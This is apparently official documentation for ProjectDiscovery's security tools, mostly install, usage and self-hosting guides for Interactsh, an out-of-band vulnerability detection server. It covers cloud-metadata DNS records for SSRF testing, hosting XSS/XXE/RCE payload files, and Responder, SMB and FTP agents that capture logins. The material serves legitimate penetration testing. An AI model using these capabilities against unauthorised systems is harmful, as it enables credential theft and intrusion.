# Open Source Tools
Source: https://docs.projectdiscovery.io/tools/index
Learn about ProjectDiscovery's Open Source Tools
Let's delve into the specifics of each category and its corresponding tools.
## Discover
In the discovery phase, the goal is to map out the entire's online presence, finding subdomains, open ports, and other valuable endpoints. The tools in this category are instrumental in revealing a comprehensive view of the target's landscape. This stage includes tools like:
A robust tool focused on passive subdomain enumeration, providing a holistic
view of a target's online assets.
A comprehensive tool for enumerating assets across multiple cloud providers,
ensuring visibility into the cloud-based infrastructure of your target.
A lightning-fast port scanner designed to swiftly identify open ports on
target hosts, ensuring no potential entry point is overlooked.
A next-generation web crawling framework designed to navigate and parse web
content efficiently, revealing hidden details of web assets.
Offering an internet-wide asset data source, Chaos is crucial for expanding
the scope of your asset discovery efforts.
Designed to search and highlight exposed hosts across various APIs, ensuring
that no stone is left unturned in the discovery phase.
Quickly map an organization's network ranges using autonomous system number
(ASN) information.
Fast and customizable subdomain wordlist generator using DSL.
massDNS wrapper to bruteforce and resolve the subdomains with wildcard handling support
## Enrich
Once assets are discovered, the next step is to enrich the gathered data. This phase involves understanding the nature of the assets, the technologies behind them, and their exposure level. This stage includes tools like:
An essential HTTP toolkit that probes services, identifying crucial details
about web servers, status codes, and other valuable metadata.
A versatile DNS toolkit that allows for efficient operations such as mass
DNS resolutions, wildcard testing, and more.
Specialized for TLS-based data collection, Tlsx offers insights into
certificates, cipher suites, and other SSL/TLS details of a target.
## Detect
With the landscape mapped and details enriched, the next phase is detection. Here, the aim is to pinpoint exploitable vulnerabilities, ensuring a thorough risk assessment. This stage includes tools like:
A vulnerability scanner designed to identify exploitable weaknesses in the
attack surface with a vast library of templates for various known
vulnerabilities.
An out-of-band (OOB) interaction gathering library, essential for
identifying vulnerabilities that may not be immediately evident through
conventional scanning methods.
Navigate the Common Vulnerabilities and Exposures (CVE) jungle with ease using cvemap, a CLI tool designed to provide a structured and easily navigable interface to various vulnerability databases.
Streamlining the workflow, Notify allows users to stream the output of
various tools to multiple platforms, ensuring real-time updates and alerts.
## Utilities
These utilities can be combined with our other tooling based on the [Unix philosophy](https://blog.projectdiscovery.io/how-projectdiscovery-applies-the-unix-philosophy-to-their-tools/) to create pipelines and customize your offensive security or bug bounty hunting program.
pdtm is a simple and easy-to-use tool for managing all of the open source
projects from ProjectDiscovery.
A utility program to perform multiple operations for a given subnet/CIDR
ranges.
A utility to detect various technologies for a given DNS / IP address.
AIx is a cli tool to interact with Large Language Models (LLM) APIs.
Swiss Army Knife Proxy for rapid deployments.
A golang enhanced version of the well known python simplehttpserver.
***
Dive into the individual tool's documentation to explore in-depth functionalities, usage examples, and best practices. Your journey into enhanced offensive security starts here!
# Interactsh Install
Source: https://docs.projectdiscovery.io/tools/interactsh/install
Learn how to install Interactsh and get started
Enter the command below in a terminal to install ProjectDiscovery's Interactsh.
```bash
go install -v github.com/projectdiscovery/interactsh/cmd/interactsh-client@latest
```
## Installation Notes
* The Interactsh CLI client requires the latest version of [**Go**](https://go.dev/doc/install)
# Interactsh Integrations
Source: https://docs.projectdiscovery.io/tools/interactsh/integrations
Learn about integrating interactsh with other tools
## Burp Suite Extension
[interactsh-collaborator](https://github.com/wdahlenburg/interactsh-collaborator) is Burp Suite extension developed and maintained by [@wdahlenb](https://twitter.com/wdahlenb)
* Download latest JAR file from [releases](https://github.com/wdahlenburg/interactsh-collaborator/releases) page.
* Open Burp Suite → Extender → Add → Java → Select JAR file → Next
* New tab named **Interactsh** will be appeared upon successful installation.
* See the [interactsh-collaborator](https://github.com/wdahlenburg/interactsh-collaborator) project for more info.
![image](https://user-images.githubusercontent.com/8293321/135176099-0e3fa01c-bdce-4f04-a94f-de0a34c7abf6.png)
## ZAP Add-On
Interactsh can be used with OWASP ZAP via the [OAST add-on for ZAP](https://www.zaproxy.org/docs/desktop/addons/oast-support/). With ZAP's scripting capabilities, you can create powerful out-of-band scan rules that leverage Interactsh's features. A standalone script template has been provided as an example (it is added automatically when you install the add-on).
* Install the OAST add-on from the [ZAP Marketplace](https://www.zaproxy.org/addons/).
* Go to Tools → Options → OAST and select **Interactsh**.
* Configure [the options](https://www.zaproxy.org/docs/desktop/addons/oast-support/services/interactsh/options/) for the client and click on "New Payload" to generate a new payload.
* OOB interactions will appear in the [OAST Tab](https://www.zaproxy.org/docs/desktop/addons/oast-support/tab/) and you can click on any of them to view the full request and response.
* You can set Interactsh as the default for ActiveScan in the `Options` > `OAST` > `General` menu.
* When checking the `Use Permanent Database` option, you can review interactions that occurred after ZAP was terminated.
* See the [OAST add-on documentation](https://www.zaproxy.org/docs/desktop/addons/oast-support/) for more info.
![zap](https://user-images.githubusercontent.com/16446369/135211920-ed24ba5a-5547-4cd4-b6d8-656af9592c20.png)
*Interactsh in ZAP*
# Interactsh Overview
Source: https://docs.projectdiscovery.io/tools/interactsh/overview
A tool for detecting out-of-band vulnerabilities
**Interactsh** is an open-source tool developed by ProjectDiscovery for detecting [out-of-band (OOB) vulnerabilities](https://portswigger.net/burp/application-security-testing/oast). These are vulnerabilities that may not be identified using conventional tools or methods. Interactsh operates by generating dynamic URLs. When these URLs are requested by a target, they trigger a callback. This callback can then be monitored and analyzed to identify potential vulnerabilities in the target.
Check out [our blog introducing Interactsh](https://blog.projectdiscovery.io/interactsh-release/) and [view the repo here](https://github.com/projectdiscovery/interactsh).
# Features
* DNS/HTTP(S)/SMTP(S)/LDAP Interaction
* CLI / Web / Burp / ZAP / Docker client
* AES encryption with zero logging
* Automatic ACME based Wildcard TLS w/ Auto Renewal
* DNS Entries for Cloud Metadata service
* Dynamic HTTP Response control
* Self-Hosted Interactsh Server
* Multiple domain support **(self-hosted)**
* NTLM/SMB/FTP/RESPONDER Listener **(self-hosted)**
* Wildcard / Protected Interactions **(self-hosted)**
* Customizable Index / File hosting **(self-hosted)**
* Customizable Payload Length **(self-hosted)**
* Custom SSL Certificate **(self-hosted)**
## Client & Server
The Interactsh tool comprises two main components: [`interachsh-client`](/tools/interactsh/running) and [`interachsh-server`](/tools/interactsh/server). Each plays a critical role in the process of detecting out-of-band vulnerabilities, but they operate in distinct manners and serve different purposes.
### Interactsh Server
* Function: Captures and records callbacks from interaction URLs.
* Deployment: Hosted publicly to receive requests from tested systems.
* Use Case: Ideal for those hosting their instance for privacy or control.
ProjectDiscovery maintains a number of [publically accessable interactsh servers](/tools/interactsh/running#projectdiscovery-interachsh-servers) that you can use in order to only run the client for your specific use case. Alternatively, you can [self host your own interactsh server](/tools/interactsh/running#self-hosted-interactsh-server) if you want it to run on your custom domain or you need more control over the server side interactions.
### Interactsh Client
* Function: Generates URLs for testing, retrieves interaction logs from the server.
* Deployment: Runs locally for managing URLs and analyzing captured data.
* Use Case: Used by testers to create and analyze tests for out-of-band vulnerabilities.
## Support
Questions about using Interactsh? Issues working through installation? Cool story or use case you want to share? Get in touch!
Check out the [Help](/help) section of the docs or reach out to us on [Discord](https://discord.com/invite/projectdiscovery).
# Running Interactsh interactsh-client
Source: https://docs.projectdiscovery.io/tools/interactsh/running
Learn about running Interactsh with examples and detailed output
For all of the flags and options available for **Interactsh** be sure to check out the [Usage](/tools/interactsh/usage) page.
If you have questions, reach out to us through [Help](/help).
## Basic Usage
The command `interact-client` generates a unique payload that can be used for Out-Of-Band (OOB) testing with minimal interactin in the output.
```console
interactsh-client
_ __ __ __
(_)___ / /____ _________ ______/ /______/ /_
/ / __ \/ __/ _ \/ ___/ __ '/ ___/ __/ ___/ __ \
/ / / / / /_/ __/ / / /_/ / /__/ /_(__ ) / / /
/_/_/ /_/\__/\___/_/ \__,_/\___/\__/____/_/ /_/ v0.0.5
projectdiscovery.io
[INF] Listing 1 payload for OOB Testing
[INF] c23b2la0kl1krjcrdj10cndmnioyyyyyn.oast.pro
[c23b2la0kl1krjcrdj10cndmnioyyyyyn] Received DNS interaction (A) from 172.253.226.100 at 2021-26-26 12:26
[c23b2la0kl1krjcrdj10cndmnioyyyyyn] Received DNS interaction (AAAA) from 32.3.34.129 at 2021-26-26 12:26
[c23b2la0kl1krjcrdj10cndmnioyyyyyn] Received HTTP interaction from 43.22.22.50 at 2021-26-26 12:26
[c23b2la0kl1krjcrdj10cndmnioyyyyyn] Received DNS interaction (MX) from 43.3.192.3 at 2021-26-26 12:26
[c23b2la0kl1krjcrdj10cndmnioyyyyyn] Received DNS interaction (TXT) from 74.32.183.135 at 2021-26-26 12:26
[c23b2la0kl1krjcrdj10cndmnioyyyyyn] Received SMTP interaction from 32.85.166.50 at 2021-26-26 12:26
```
## Session File
`interactsh-client` with `-sf, -session-file` flag can be used to store/read the current session information from user defined file. This functionality is useful to resume the same session to poll the interactions even after the client gets stopped or closed.
```console
interactsh-client -sf interact.session
_ __ __ __
(_)___ / /____ _________ ______/ /______/ /_
/ / __ \/ __/ _ \/ ___/ __ '/ ___/ __/ ___/ __ \
/ / / / / /_/ __/ / / /_/ / /__/ /_(__ ) / / /
/_/_/ /_/\__/\___/_/ \__,_/\___/\__/____/_/ /_/ 1.0.3
projectdiscovery.io
[INF] Listing 1 payload for OOB Testing
[INF] c23b2la0kl1krjcrdj10cndmnioyyyyyn.oast.pro
[c23b2la0kl1krjcrdj10cndmnioyyyyyn] Received DNS interaction (A) from 172.253.226.100 at 2021-26-26 12:26
[c23b2la0kl1krjcrdj10cndmnioyyyyyn] Received DNS interaction (AAAA) from 32.3.34.129 at 2021-26-26 12:26
[c23b2la0kl1krjcrdj10cndmnioyyyyyn] Received HTTP interaction from 43.22.22.50 at 2021-26-26 12:26
[c23b2la0kl1krjcrdj10cndmnioyyyyyn] Received DNS interaction (MX) from 43.3.192.3 at 2021-26-26 12:26
[c23b2la0kl1krjcrdj10cndmnioyyyyyn] Received DNS interaction (TXT) from 74.32.183.135 at 2021-26-26 12:26
[c23b2la0kl1krjcrdj10cndmnioyyyyyn] Received SMTP interaction from 32.85.166.50 at 2021-26-26 12:26
```
## Verbose Mode
Running the `interactsh-client` in **verbose mode** (v) allows you to to see the whole request and response, along with an output file to analyze afterwards.
```console
interactsh-client -v -o interactsh-logs.txt
_ __ __ __
(_)___ / /____ _________ ______/ /______/ /_
/ / __ \/ __/ _ \/ ___/ __ '/ ___/ __/ ___/ __ \
/ / / / / /_/ __/ / / /_/ / /__/ /_(__ ) / / /
/_/_/ /_/\__/\___/_/ \__,_/\___/\__/____/_/ /_/ 1.0.3
projectdiscovery.io
[INF] Listing 1 payload for OOB Testing
[INF] c58bduhe008dovpvhvugcfemp9yyyyyyn.oast.pro
[c58bduhe008dovpvhvugcfemp9yyyyyyn] Received HTTP interaction from 103.22.142.211 at 2021-09-26 18:08:07
------------
HTTP Request
------------
GET /favicon.ico HTTP/2.0
Host: c58bduhe008dovpvhvugcfemp9yyyyyyn.oast.pro
Referer: https://c58bduhe008dovpvhvugcfemp9yyyyyyn.oast.pro
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36
-------------
HTTP Response
-------------
HTTP/1.1 200 OK
Connection: close
Content-Type: text/html; charset=utf-8
Server: oast.pro
nyyyyyy9pmefcguvhvpvod800ehudb85c
```
## Choosing a Server
When running `interactsh-client`, it is required that it can connect to a running `interactsh-server`. The Interactsh server captures and logs out-of-band interactions, while the client generates testing URLs and analyzes these interactions for vulnerabilities.
You can either use one of ProjectDiscovery's default interactsh servers or choose you run a self-hosted sever.
### ProjectDiscovery interachsh servers
We maintain a list of default Interactsh servers to use with `interactsh-client`:
* oast.pro
* oast.live
* oast.site
* oast.online
* oast.fun
* oast.me
Default servers are subject to change/rotate/down at any time, thus we recommend using a self-hosted interactsh server if you are experiencing issues with the default server.
### Self-Hosted interactsh Server
Using the `server` flag, `interactsh-client` can be configured to connect with a self-hosted Interactsh server, this flag accepts single or multiple server separated by comma.
```sh
interactsh-client -server hackwithautomation.com
```
**Using a Protected Self-Hosted Server**
Using the `token` flag, `interactsh-client` can connect to a self-hosted Interactsh server that is protected with authentication.
```sh
interactsh-client -server hackwithautomation.com -token XXX
```
## Using with Notify
If you are away from your terminal, you may use [notify](https://github.com/projectdiscovery/notify) to send a real-time interaction notification to any supported platform.
```sh
interactsh-client | notify
```
![image](https://user-images.githubusercontent.com/8293321/116283535-9bcac180-a7a9-11eb-94d5-0313d4812fef.png)
## Interactsh Web Client
[Interactsh-web](https://github.com/projectdiscovery/interactsh-web) is a free and open-source web client that displays Interactsh interactions in a well-managed dashboard in your browser. It uses the browser's local storage to store and display all incoming interactions. By default, the web client is configured to use **interact.sh** as default interactsh server, and supports other self-hosted public/authencaited interactsh servers as well.
A hosted instance of **interactsh-web** client is available at [https://app.interactsh.com](https://app.interactsh.com)
![image](https://user-images.githubusercontent.com/8293321/136621531-d72c9ece-0076-4db1-98c9-21dcba4ba09c.png)
## Interactsh Docker Client
A [Docker image](https://hub.docker.com/r/projectdiscovery/interactsh-client) is also provided with interactsh client that is ready to run and can be used in the following way:
```sh
docker run projectdiscovery/interactsh-client:latest
```
```console
docker run projectdiscovery/interactsh-client:latest
_ __ __ __
(_)___ / /____ _________ ______/ /______/ /_
/ / __ \/ __/ _ \/ ___/ __ '/ ___/ __/ ___/ __ \
/ / / / / /_/ __/ / / /_/ / /__/ /_(__ ) / / /
/_/_/ /_/\__/\___/_/ \__,_/\___/\__/____/_/ /_/ v1.0.0
projectdiscovery.io
[INF] Listing 1 payload for OOB Testing
[INF] c59e3crp82ke7bcnedq0cfjqdpeyyyyyn.oast.pro
```
## Integrations
### Burp Suite Extension
See [integrations](/tools/interactsh/integrations) for more details on the [interactsh-collaborator](https://github.com/wdahlenburg/interactsh-collaborator).
### ZAP Add-On
See [integrations](/tools/interactsh/integrations) for more details on using interactsh with ZAP.
### Use as library
The [examples](https://github.com/projectdiscovery/interactsh/tree/main/examples) show using the interactsh client library to get external interactions for a generated URL by making a http request to the URL.
### Nuclei - OAST
[Nuclei](https://github.com/projectdiscovery/nuclei) vulnerability scanner utilize **Interactsh** for automated payload generation and detection of out of band based security vulnerabilities.
See [Nuclei + Interactsh](https://blog.projectdiscovery.io/nuclei-interactsh-integration/) Integration blog and [guide document](https://docs.projectdiscovery.io/templates/reference/oob-testing) for more information.
## Cloud Metadata
Interactsh server supports DNS records for cloud metadata services, which is useful for testing SSRF-related vulnerabilities.
Currently supported metadata services:
* [AWS](https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html)
* [Alibaba](https://www.alibabacloud.com/blog/alibaba-cloud-ecs-metadata-user-data-and-dynamic-data_594351)
Example:
* **aws.interact.sh** points to 169.254.169.254
* **alibaba.interact.sh** points to 100.100.100.200
# Interactsh Server
Source: https://docs.projectdiscovery.io/tools/interactsh/server
Learn about self-hosting an interactsh server
## Interactsh Server
Interactsh server runs multiple services and captures all the incoming requests. To host an instance of **interactsh-server**, you are required to setup:
1. Domain name with custom **host names** and **nameservers**.
2. Basic droplet running 24/7 in the background.
## Usage
```sh
interactsh-server -h
```
This will display help for the tool. Here are all the switches it supports.
```yaml
Usage:
./interactsh-server [flags]
Flags:
INPUT:
-d, -domain string[] single/multiple configured domain to use for server
-ip string public ip address to use for interactsh server
-lip, -listen-ip string public ip address to listen on (default "0.0.0.0")
-e, -eviction int number of days to persist interaction data in memory (default 30)
-ne, -no-eviction disable periodic data eviction from memory
-a, -auth enable authentication to server using random generated token
-t, -token string enable authentication to server using given token
-acao-url string origin url to send in acao header to use web-client) (default "*")
-sa, -skip-acme skip acme registration (certificate checks/handshake + TLS protocols will be disabled)
-se, -scan-everywhere scan canary token everywhere
-cidl, -correlation-id-length int length of the correlation id preamble (default 20)
-cidn, -correlation-id-nonce-length int length of the correlation id nonce (default 13)
-cert string custom certificate path
-privkey string custom private key path
-oih, -origin-ip-header string HTTP header containing origin ip (interactsh behind a reverse proxy)
CONFIG:
-config string flag configuration file (default "$HOME/.config/interactsh-server/config.yaml")
-dr, -dynamic-resp enable setting up arbitrary response data
-cr, -custom-records string custom dns records YAML file for DNS server
-hi, -http-index string custom index file for http server
-hd, -http-directory string directory with files to serve with http server
-ds, -disk disk based storage
-dsp, -disk-path string disk storage path
-csh, -server-header string custom value of Server header in response
-dv, -disable-version disable publishing interactsh version in response header
UPDATE:
-up, -update update interactsh-server to latest version
-duc, -disable-update-check disable automatic interactsh-server update check
SERVICES:
-dns-port int port to use for dns service (default 53)
-http-port int port to use for http service (default 80)
-https-port int port to use for https service (default 443)
-smtp-port int port to use for smtp service (default 25)
-smtps-port int port to use for smtps service (default 587)
-smtp-autotls-port int port to use for smtps autotls service (default 465)
-ldap-port int port to use for ldap service (default 389)
-ldap enable ldap server with full logging (authenticated)
-wc, -wildcard enable wildcard interaction for interactsh domain (authenticated)
-smb start smb agent - impacket and python 3 must be installed (authenticated)
-responder start responder agent - docker must be installed (authenticated)
-ftp start ftp agent (authenticated)
-smb-port int port to use for smb service (default 445)
-ftp-port int port to use for ftp service (default 21)
-ftp-dir string ftp directory - temporary if not specified
DEBUG:
-version show version of the project
-debug start interactsh server in debug mode
-ep, -enable-pprof enable pprof debugging server
-health-check, -hc run diagnostic check up
-metrics enable metrics endpoint
-v, -verbose display verbose interaction
```
## Getting started
### Configuring Interactsh domain
For this example, we will utilize GoDaddy for domain registration and a DigitalOcean droplet as the server, where a basic \$5 droplet efficiently supports a self-hosted Interactsh server. If using different tools, please follow your registrar's guidelines for creating or updating DNS entries.
* Navigate to `https://dcc.godaddy.com/manage/{{domain}}/dns/hosts`
* Advanced Features → Host names → Add → Submit `ns1`, `ns2` with your `SERVER_IP` as value
![image](https://user-images.githubusercontent.com/8293321/135175512-135259fb-0490-4038-845a-0b62b1b8f549.png)
* Navigate to `https://dns.godaddy.com/{{domain}}/nameservers`
* Click "I'll use my own nameservers" → Submit `ns1.INTERACTSH_DOMAIN`, `ns2.INTERACTSH_DOMAIN`
![image](https://user-images.githubusercontent.com/8293321/135175627-ea9639fd-353d-441b-a9a4-dae7f540d0ae.png)
### Configuring Interactsh server
Install `interactsh-server` on your **VPS**
```bash
go install -v github.com/projectdiscovery/interactsh/cmd/interactsh-server@latest
```
Considering domain name setup is **completed**, run the below command to run `interactsh-server`
```bash
interactsh-server -domain INTERACTSH_DOMAIN
```
Following is an example of a successful installation and operation of a self-hosted server:
![image](https://user-images.githubusercontent.com/8293321/150676089-b5638c19-33a3-426a-987c-3ac6fa227012.png)
A number of needed flags are configured automatically to run `interactsh-server` with default settings. For example, `ip` and `listen-ip` flags set with the Public IP address of the system when possible.
### Running Interactsh Server
```console
interactsh-server -domain interact.sh
_ __ __ __
(_)___ / /____ _________ ______/ /______/ /_
/ / __ \/ __/ _ \/ ___/ __ '/ ___/ __/ ___/ __ \
/ / / / / /_/ __/ / / /_/ / /__/ /_(__ ) / / /
/_/_/ /_/\__/\___/_/ \__,_/\___/\__/____/_/ /_/ v1.0.0
projectdiscovery.io
[INF] Listening with the following services:
[HTTPS] Listening on TCP 46.101.25.250:443
[HTTP] Listening on TCP 46.101.25.250:80
[SMTPS] Listening on TCP 46.101.25.250:587
[LDAP] Listening on TCP 46.101.25.250:389
[SMTP] Listening on TCP 46.101.25.250:25
[DNS] Listening on TCP 46.101.25.250:53
[DNS] Listening on UDP 46.101.25.250:53
```
## Additional Server Options
### Using Multiple Domains
Multiple domain names can be given in the same way as above to run the same interactsh server across multiple **configured domains**.
```console
interactsh-server -d oast.pro,oast.me
_ __ __ __
(_)___ / /____ _________ ______/ /______/ /_
/ / __ \/ __/ _ \/ ___/ __ '/ ___/ __/ ___/ __ \
/ / / / / /_/ __/ / / /_/ / /__/ /_(__ ) / / /
/_/_/ /_/\__/\___/_/ \__,_/\___/\__/____/_/ /_/ 1.0.5
projectdiscovery.io
[INF] Loading existing SSL Certificate for: [*.oast.pro, oast.pro]
[INF] Loading existing SSL Certificate for: [*.oast.me, oast.me]
[INF] Listening with the following services:
[HTTPS] Listening on TCP 46.101.25.250:443
[HTTP] Listening on TCP 46.101.25.250:80
[SMTPS] Listening on TCP 46.101.25.250:587
[LDAP] Listening on TCP 46.101.25.250:389
[SMTP] Listening on TCP 46.101.25.250:25
[DNS] Listening on TCP 46.101.25.250:53
[DNS] Listening on UDP 46.101.25.250:53
```
While running interactsh server on **Cloud VM**'s like Amazon EC2, Google Cloud Platform (GCP), it is required to update the security rules to allow **"all traffic"** for inbound connections.
There are more useful capabilities supported by `interactsh-server` that are not enabled by default and are intended to be used only by **self-hosted** servers.
### Hosting behind a reverse proxy
`interactsh-server` might require custom ports for services if the default ones are already busy. If this is the case but still default ports are required as part of the payload, it's possible to configure `interactsh-server` behind a reverse proxy, by port-forwarding HTTP/TCP/UDP based services via `http/stream` proxy directive (`proxy_pass`).
### Nginx
Assuming that `interactsh-server` essential services run on the following ports:
* HTTP: 8080/TCP
* HTTPS: 8440/TCP
* SMTP: 8025/TCP
* DNS: 8053/UDP
* DNS: 8053/TCP
The nginx configuration file to forward the traffic would look like the following one:
```conf
# http/https
http {
server {
listen 443 ssl;
server_name mysite.com;
ssl_certificate /etc/nginx/interactsh.pem;
ssl_certificate_key /etc/nginx/interactsh.key;
location / {
proxy_pass https://interachsh.mysite.com:80/;
proxy_set_header Host $host;
proxy_set_header X-Real-IP $remote_addr;
proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
proxy_set_header X-Forwarded-Proto $scheme;
}
}
}
stream {
# smtp
server {
listen 25;
proxy_pass interachsh.mysite.com:8025;
}
# dns
server {
listen 53;
proxy_pass interachsh.mysite.com:8053;
}
server {
listen 53 udp;
proxy_pass interachsh.mysite.com:8053;
}
}
```
## Hosting Additional Data
### Custom Server Index
Index page for http server can be customized while running custom interactsh server using `-http-index` flag.
```console
interactsh-server -d hackwithautomation.com -http-index banner.html
```
`{DOMAIN}` placeholder is also supported in index file to replace with server domain name.
![image](https://user-images.githubusercontent.com/8293321/179397016-f6ee12e0-5b0b-42b6-83e7-f0972a804655.png)
### Static File Hosting
Interactsh http server optionally enables file hosting to help in security testing. This capability can be used with a self-hosted server to serve files for common payloads for **XSS, XXE, RCE** and other attacks.
To use this feature, `-http-directory` flag can be used which accepts diretory as input and files are served under `/s/` directory.
```console
interactsh-server -d hackwithautomation.com -http-directory ./paylods
```
![image](https://user-images.githubusercontent.com/8293321/179396480-d5ff8399-8b91-48aa-b21f-c67e40e80945.png)
### Dynamic HTTP Response
Interactsh http server optionally enables responding with dynamic HTTP response by using query parameters. This feature can be enabled by using `-dr` or `-dynamic-resp` flag.
The following query parameter names are supported - `body`, `header`, `status` and `delay`. Multiple `header` parameters can be specified to set multiple headers.
* **body** (response body)
* **header** (response header)
* **status** (response status code)
* **delay** (response time)
```console
curl -i 'https://hackwithautomation.com/x?status=307&body=this+is+example+body&delay=1&header=header1:value1&header=header1:value12'
HTTP/2 307
header1: value1
header1: value12
server: hackwithautomation.com
x-interactsh-version: 1.0.7
content-type: text/plain; charset=utf-8
content-length: 20
date: Tue, 13 Sep 2022 12:31:05 GMT
this is example body
```
> **Note**:
* Dynamic HTTP Response feature is disabled as default.
* By design, this feature lets anyone run client-side code / redirects using your interactsh domain / server
* Using this option with an isolated domain is recommended to **avoid security impact** on associated root/subdomains.
## Wildcard Interaction
To enable `wildcard` interaction for configured Interactsh domain `wildcard` flag can be used with implicit authentication protection via the `auth` flag if the `token` flag is omitted.
```console
interactsh-server -domain hackwithautomation.com -wildcard
_ __ __ __
(_)___ / /____ _________ ______/ /______/ /_
/ / __ \/ __/ _ \/ ___/ __ '/ ___/ __/ ___/ __ \
/ / / / / /_/ __/ / / /_/ / /__/ /_(__ ) / / /
/_/_/ /_/\__/\___/_/ \__,_/\___/\__/____/_/ /_/ v1.0.0
projectdiscovery.io
[INF] Client Token: 699c55544ce1604c63edb769e51190acaad1f239589a35671ccabd664385cfc7
[INF] Listening with the following services:
[HTTPS] Listening on TCP 157.230.223.165:443
[HTTP] Listening on TCP 157.230.223.165:80
[SMTPS] Listening on TCP 157.230.223.165:587
[LDAP] Listening on TCP 157.230.223.165:389
[SMTP] Listening on TCP 157.230.223.165:25
[DNS] Listening on TCP 157.230.223.165:53
[DNS] Listening on UDP 157.230.223.165:53
```
## Advanced Options
### Custom Payload Length
The length of the interactsh payload is **33** by default, consisting of **20** (unique correlation-id) + **13** (nonce token), which can be customized using the `cidl` and `cidn` flags to make shorter when required with self-hosted interacsh server.
```console
interactsh-server -d hackwithautomation.com -cidl 4 -cidn 6
_ __ __ __
(_)___ / /____ _________ ______/ /______/ /_
/ / __ \/ __/ _ \/ ___/ __ '/ ___/ __/ ___/ __ \
/ / / / / /_/ __/ / / /_/ / /__/ /_(__ ) / / /
/_/_/ /_/\__/\___/_/ \__,_/\___/\__/____/_/ /_/ v1.0.2
projectdiscovery.io
[INF] Loading existing SSL Certificate for: [*.hackwithautomation.com, hackwithautomation.com]
[INF] Listening with the following services:
[HTTPS] Listening on TCP 157.230.223.165:443
[SMTPS] Listening on TCP 157.230.223.165:587
[DNS] Listening on UDP 157.230.223.165:53
[HTTP] Listening on TCP 157.230.223.165:80
[LDAP] Listening on TCP 157.230.223.165:389
[SMTP] Listening on TCP 157.230.223.165:25
[DNS] Listening on TCP 157.230.223.165:53
```
**Note:** It is important and required to use same length on both side (**client** and **server**), otherwise co-relation will not work.
```console
interactsh-client -s hackwithautomation.com -cidl 4 -cidn 6
_ __ __ __
(_)___ / /____ _________ ______/ /______/ /_
/ / __ \/ __/ _ \/ ___/ __ '/ ___/ __/ ___/ __ \
/ / / / / /_/ __/ / / /_/ / /__/ /_(__ ) / / /
/_/_/ /_/\__/\___/_/ \__,_/\___/\__/____/_/ /_/ v1.0.2
projectdiscovery.io
[INF] Listing 1 payload for OOB Testing
[INF] c8rf4e8xm4.hackwithautomation.com
```
### Custom SSL Certificate
The [certmagic](https://github.com/caddyserver/certmagic) library is used by default by interactsh server to produce wildcard certificates for requested domain in an automatic way. To use your own SSL certificate with self-hosted interactsh server, `cert` and `privkey` flag can be used to provider required certificate files.
**Note:** To utilize all of the functionality of the SSL protocol, a wildcard certificate is mandatory.
```console
interactsh-server -d hackwithautomation.com -cert hackwithautomation.com.crt -privkey hackwithautomation.com.key
_ __ __ __
(_)___ / /____ _________ ______/ /______/ /_
/ / __ \/ __/ _ \/ ___/ __ '/ ___/ __/ ___/ __ \
/ / / / / /_/ __/ / / /_/ / /__/ /_(__ ) / / /
/_/_/ /_/\__/\___/_/ \__,_/\___/\__/____/_/ /_/ v1.0.2
projectdiscovery.io
[INF] Listening with the following services:
[HTTPS] Listening on TCP 157.230.223.165:443
[SMTP] Listening on TCP 157.230.223.165:25
[HTTP] Listening on TCP 157.230.223.165:80
[LDAP] Listening on TCP 157.230.223.165:389
[DNS] Listening on TCP 157.230.223.165:53
[SMTPS] Listening on TCP 157.230.223.165:587
[DNS] Listening on UDP 157.230.223.165:53
```
## Supported Protocols
### LDAP
As default, Interactsh server support LDAP interaction for the payload included in [search query](https://ldapwiki.com/wiki/LDAP%20Query%20Examples), additionally `ldap` flag can be used for complete logging.
```console
interactsh-server -domain hackwithautomation.com -sa -ldap
_ __ __ __
(_)___ / /____ _________ ______/ /______/ /_
/ / __ \/ __/ _ \/ ___/ __ '/ ___/ __/ ___/ __ \
/ / / / / /_/ __/ / / /_/ / /__/ /_(__ ) / / /
/_/_/ /_/\__/\___/_/ \__,_/\___/\__/____/_/ /_/ v1.0.0
projectdiscovery.io
[INF] Client Token: deb58fc151e6f0e53d448be3eb14cd7a11590d8950d142b9cd1abac3c2e3e7bc
[INF] Listening with the following services:
[DNS] Listening on UDP 157.230.223.165:53
[LDAP] Listening on TCP 157.230.223.165:389
[HTTP] Listening on TCP 157.230.223.165:80
[SMTP] Listening on TCP 157.230.223.165:25
[DNS] Listening on TCP 157.230.223.165:53
```
### FTP
FTP support can be enabled with the `-ftp` flag and is recommended for self-hosted instances only. The FTP agent simulates a fully-functional FTP server agent with authentication that captures authentications with every file operation. By default, the agent listens on port 21 (this can be changed with the `-ftp-port` flag) and lists in read-only mode the content of the OS default temporary directory (customizable with the `-ftp-dir` option).
Example of starting the FTP daemon and capturing a login interaction:
```console
$ sudo go run . -ftp -skip-acme -debug -domain localhost
...
[INF] Outbound IP: 192.168.1.16
[INF] Client Token: 6dc07e4a76c3d5e58e4bea13ce073dc403499b128c62397aff7b934a6e4822e3
[INF] Listening with the following services:
[DNS] Listening on TCP 192.168.1.16:53
[SMTP] Listening on TCP 192.168.1.16:25
[HTTP] Listening on TCP 192.168.1.16:80
[FTP] Listening on TCP 192.168.1.16:21
[DNS] Listening on UDP 192.168.1.16:53
[LDAP] Listening on TCP 192.168.1.16:389
[DBG] FTP Interaction:
{"protocol":"ftp","unique-id":"","full-id":"","raw-request":"USER test\ntest logging in","remote-address":"127.0.0.1:51564","timestamp":"2022-09-29T00:49:42.212323+02:00"}
```
### SMB
The `-smb` flag enables the Samba protocol (only for self-hosted instances). The samba protocol uses [impacket](https://github.com/SecureAuthCorp/impacket) `smbserver` class to simulate a samba daemon share listening on port `445` unless changed by the `-smb-port` flag. When enabled, interactsh executes under the hoods the script `smb_server.py`. Hence Python3 and impacket dependencies are required.
Example of enabling the samba server:
```console
$ sudo interactsh-server -smb -skip-acme -debug -domain localhost
```
### Responder
[Responder](https://github.com/lgandx/Responder) is wrapped in a docker container exposing various service ports via docker port forwarding. The interactions are retrieved by monitoring the shared log file `Responder-Session.log` in the temp folder. To use it on a self-hosted instance, it's necessary first to build the docker container and tag it as `interactsh`(docker daemon must be configured correctly and with port forwarding capabilities):
```console
docker build . -t interactsh
```
Then run the service with:
```console
$ sudo interactsh-server -responder -d localhost
```
On default settings, the daemon listens on the following ports:
* UDP: 137, 138, 1434
* TCP: 21 (might collide with FTP daemon if used), 110, 135, 139, 389, 445, 1433, 3141, 3128
